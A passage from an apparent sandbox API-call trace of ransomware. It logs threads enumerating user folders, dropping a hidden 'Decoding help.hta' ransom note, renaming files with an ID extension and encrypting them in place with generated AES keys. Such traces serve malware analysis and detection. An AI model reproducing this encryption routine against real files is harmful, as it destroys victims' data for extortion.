dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x540 [0049.063] CloseHandle (hObject=0x540) returned 1 [0049.063] FindNextFileW (in: hFindFile=0x5db3b8, lpFindFileData=0xd18fd30 | out: lpFindFileData=0xd18fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b0b7d20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6b0b7d20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CrashReports", cAlternateFileName="CRASHR~1")) returned 0 [0049.063] FindClose (in: hFindFile=0x5db3b8 | out: hFindFile=0x5db3b8) returned 1 Thread: id = 649 os_tid = 0xe68 [0049.056] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\*.*", lpFindFileData=0xd28fd30 | out: lpFindFileData=0xd28fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd30cb40, ftCreationTime.dwHighDateTime=0x1d4d36b, ftLastAccessTime.dwLowDateTime=0x1abfb200, ftLastAccessTime.dwHighDateTime=0x1d4cc44, ftLastWriteTime.dwLowDateTime=0x1abfb200, ftLastWriteTime.dwHighDateTime=0x1d4cc44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3070 [0049.886] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.887] FindNextFileW (in: hFindFile=0x5e3070, lpFindFileData=0xd28fd30 | out: lpFindFileData=0xd28fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd30cb40, ftCreationTime.dwHighDateTime=0x1d4d36b, ftLastAccessTime.dwLowDateTime=0x1abfb200, ftLastAccessTime.dwHighDateTime=0x1d4cc44, ftLastWriteTime.dwLowDateTime=0x1abfb200, ftLastWriteTime.dwHighDateTime=0x1d4cc44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.887] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.887] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.887] FindNextFileW (in: hFindFile=0x5e3070, lpFindFileData=0xd28fd30 | out: lpFindFileData=0xd28fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab5f070, ftCreationTime.dwHighDateTime=0x1d4c91c, ftLastAccessTime.dwLowDateTime=0xc5f050c0, ftLastAccessTime.dwHighDateTime=0x1d4cecf, ftLastWriteTime.dwLowDateTime=0xc5f050c0, ftLastWriteTime.dwHighDateTime=0x1d4cecf, nFileSizeHigh=0x0, nFileSizeLow=0xca91, dwReserved0=0x0, dwReserved1=0x0, cFileName="-0gFTw69sAO_Isc.mp4", cAlternateFileName="-0GFTW~1.MP4")) returned 1 [0050.239] lstrcpyW (in: lpString1=0x1101f668, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\*.*" [0050.239] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\*.*") returned 64 [0050.239] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\Decoding help.hta" [0050.239] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vuts0ef5zxcfizeqf3n\\decoding help.hta")) returned 0xffffffff [0050.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vuts0ef5zxcfizeqf3n\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0051.673] WriteFile (in: hFile=0x384, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xd28fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xd28fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.699] CloseHandle (hObject=0x384) returned 1 [0053.677] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.423] lstrcmpiW (lpString1="Decoding help.hta", lpString2="-0gFTw69sAO_Isc.mp4") returned 1 [0058.423] lstrlenW (lpString="-0gFTw69sAO_Isc.mp4") returned 19 [0058.423] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\*.*" [0058.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\*.*") returned 64 [0058.423] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\", lpString2="-0gFTw69sAO_Isc.mp4" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\-0gFTw69sAO_Isc.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\-0gFTw69sAO_Isc.mp4" [0058.423] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\-0gFTw69sAO_Isc.mp4" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\-0gFTw69sAO_Isc.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\-0gFTw69sAO_Isc.mp4" [0058.423] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\-0gFTw69sAO_Isc.mp4", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\-0gFTw69sAO_Isc.mp4.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\-0gFTw69sAO_Isc.mp4.[ID]g9uZrLhJaygpwRm1[ID]" [0058.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\-0gFTw69sAO_Isc.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vuts0ef5zxcfizeqf3n\\-0gftw69sao_isc.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\-0gFTw69sAO_Isc.mp4.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vuts0ef5zxcfizeqf3n\\-0gftw69sao_isc.mp4.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Vuts0ef5ZXCFIZEqf3N\\-0gFTw69sAO_Isc.mp4.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vuts0ef5zxcfizeqf3n\\-0gftw69sao_isc.mp4.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc20 [0058.424] CreateFileMappingA (hFile=0xc20, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc24 [0058.424] CryptAcquireContextA (in: phProv=0xd28fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xd28fcec*=0x2aac6198) returned 1 [0060.215] CryptGenKey (in: hProv=0x2aac6198, Algid=0x6610, dwFlags=0x1, phKey=0xd28fce8 | out: phKey=0xd28fce8*=0x5fca760) returned 1 [0060.215] CryptExportKey (in: hKey=0x5fca760, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xd28fbe4, pdwDataLen=0xd28fce4 | out: pbData=0xd28fbe4*, pdwDataLen=0xd28fce4*=0x2c) returned 1 [0060.215] MapViewOfFile (hFileMappingObject=0xc24, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xca80) returned 0x4490000 [0064.293] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xd28fbe4*, pdwDataLen=0xd28fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xd28fbe4*, pdwDataLen=0xd28fcf8*=0x100) returned 1 [0064.293] CryptEncrypt (in: hKey=0x5fca760, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4490000, pdwDataLen=0xd28fce4*=0xca80, dwBufLen=0xca80 | out: pbData=0x4490000*, pdwDataLen=0xd28fce4*=0xca80) returned 1 [0064.294] UnmapViewOfFile (lpBaseAddress=0x4490000) returned 1 [0064.296] CloseHandle (hObject=0xc24) returned 1 [0064.296] CryptDestroyKey (hKey=0x5fca760) returned 1 [0064.297] CryptReleaseContext (hProv=0x2aac6198, dwFlags=0x0) returned 1 [0064.297] SetFilePointerEx (in: hFile=0xc20, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.297] WriteFile (hFile=0xc20, lpBuffer=0xd28fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xd28fcf8, lpOverlapped=0x0) Thread: id = 650 os_tid = 0xe6c [0049.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\*.*", lpFindFileData=0xd7cfd30 | out: lpFindFileData=0xd7cfd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 651 os_tid = 0xe70 [0049.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*.*", lpFindFileData=0x65cfd30 | out: lpFindFileData=0x65cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6712b0 [0049.068] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.068] FindNextFileW (in: hFindFile=0x6712b0, lpFindFileData=0x65cfd30 | out: lpFindFileData=0x65cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.068] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.068] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.068] FindNextFileW (in: hFindFile=0x6712b0, lpFindFileData=0x65cfd30 | out: lpFindFileData=0x65cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0049.068] lstrcmpW (lpString1=".", lpString2="10.0") returned -1 [0049.068] lstrcmpW (lpString1="..", lpString2="10.0") returned -1 [0049.068] lstrcmpiW (lpString1="windows", lpString2="10.0") returned 1 [0049.069] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*.*" [0049.069] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*.*") returned 65 [0049.069] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\", lpString2="10.0" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0" [0049.069] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*.*" [0049.069] GlobalMemoryStatus (in: lpBuffer=0x65cfd10 | out: lpBuffer=0x65cfd10) [0049.069] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x97aa438, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x628 [0049.075] CloseHandle (hObject=0x628) returned 1 [0049.075] FindNextFileW (in: hFindFile=0x6712b0, lpFindFileData=0x65cfd30 | out: lpFindFileData=0x65cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0049.075] FindClose (in: hFindFile=0x6712b0 | out: hFindFile=0x6712b0) returned 1 Thread: id = 652 os_tid = 0xe74 [0049.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*.*", lpFindFileData=0x724fd30 | out: lpFindFileData=0x724fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671e70 [0049.073] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.073] FindNextFileW (in: hFindFile=0x671e70, lpFindFileData=0x724fd30 | out: lpFindFileData=0x724fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.074] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.074] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.074] FindNextFileW (in: hFindFile=0x671e70, lpFindFileData=0x724fd30 | out: lpFindFileData=0x724fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce719dc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x49c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACECache11.lst", cAlternateFileName="ACECAC~1.LST")) returned 1 [0049.074] lstrcpyW (in: lpString1=0x985a718, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*.*" [0049.074] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*.*") returned 63 [0049.074] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Decoding help.hta" [0049.074] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\decoding help.hta")) returned 0xffffffff [0049.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x750 [0051.655] WriteFile (in: hFile=0x750, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x724fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x724fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.697] CloseHandle (hObject=0x750) returned 1 [0053.676] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.420] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ACECache11.lst") returned 1 [0058.420] lstrlenW (lpString="ACECache11.lst") returned 14 [0058.420] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*.*" [0058.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*.*") returned 63 [0058.420] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\", lpString2="ACECache11.lst" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" [0058.420] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" [0058.420] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.[ID]g9uZrLhJaygpwRm1[ID]" [0058.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0058.421] CreateFileMappingA (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc0c [0058.421] CryptAcquireContextA (in: phProv=0x724fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x724fcec*=0x2aac6088) returned 1 [0060.214] CryptGenKey (in: hProv=0x2aac6088, Algid=0x6610, dwFlags=0x1, phKey=0x724fce8 | out: phKey=0x724fce8*=0x5a5a30) returned 1 [0060.214] CryptExportKey (in: hKey=0x5a5a30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x724fbe4, pdwDataLen=0x724fce4 | out: pbData=0x724fbe4*, pdwDataLen=0x724fce4*=0x2c) returned 1 [0060.214] MapViewOfFile (hFileMappingObject=0xc0c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x480) returned 0x40c0000 Thread: id = 653 os_tid = 0xe78 [0049.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*.*", lpFindFileData=0x738fd30 | out: lpFindFileData=0x738fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671f70 [0049.079] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.079] FindNextFileW (in: hFindFile=0x671f70, lpFindFileData=0x738fd30 | out: lpFindFileData=0x738fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.079] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.079] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.079] FindNextFileW (in: hFindFile=0x671f70, lpFindFileData=0x738fd30 | out: lpFindFileData=0x738fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 1 [0049.079] lstrcmpW (lpString1=".", lpString2="Data") returned -1 [0049.079] lstrcmpW (lpString1="..", lpString2="Data") returned -1 [0049.079] lstrcmpiW (lpString1="windows", lpString2="Data") returned 1 [0049.079] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*.*" [0049.079] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*.*") returned 60 [0049.079] lstrcatW (in: 